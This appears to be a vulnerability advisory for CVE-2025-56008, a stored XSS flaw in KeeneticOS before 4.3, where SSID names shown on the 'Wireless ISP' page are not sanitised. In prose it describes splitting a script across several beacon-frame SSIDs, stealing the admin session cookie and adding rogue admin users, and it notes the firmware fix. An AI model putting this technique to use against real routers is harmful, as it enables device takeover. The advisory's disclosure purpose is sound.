CVE-2025-56008

Vulnerability

Overview

A stored cross-site scripting (XSS) vulnerability exists in KeeneticOS versions before 4.3 on the "Wireless ISP" page. The vulnerability arises because the router does not properly sanitize access point SSID names displayed on this page, allowing an attacker to inject arbitrary HTML and JavaScript into the administrative interface [1][2].

Attack

Vector and Exploitation

An attacker within Wi-Fi range can broadcast a specially crafted SSID using tools like scapy. The payload must fit within the 32-character SSID limit, but the attacker can work around this by broadcasting multiple beacon frames that store fragments in JavaScript variables and then a final frame that assembles and executes the full payload. When an administrator views the Wireless ISP page, the injected script executes in the context of the admin session [2].

Impact

The attacker can exfiltrate the session cookie via postMessage to an attacker-controlled endpoint and then use that authentication token to add new administrative users with full permissions, effectively taking over the router [1][2].

Mitigation

Keenetic has addressed this vulnerability in KeeneticOS version 4.3. Users are advised to update to the latest firmware. No workarounds are provided for older versions [1].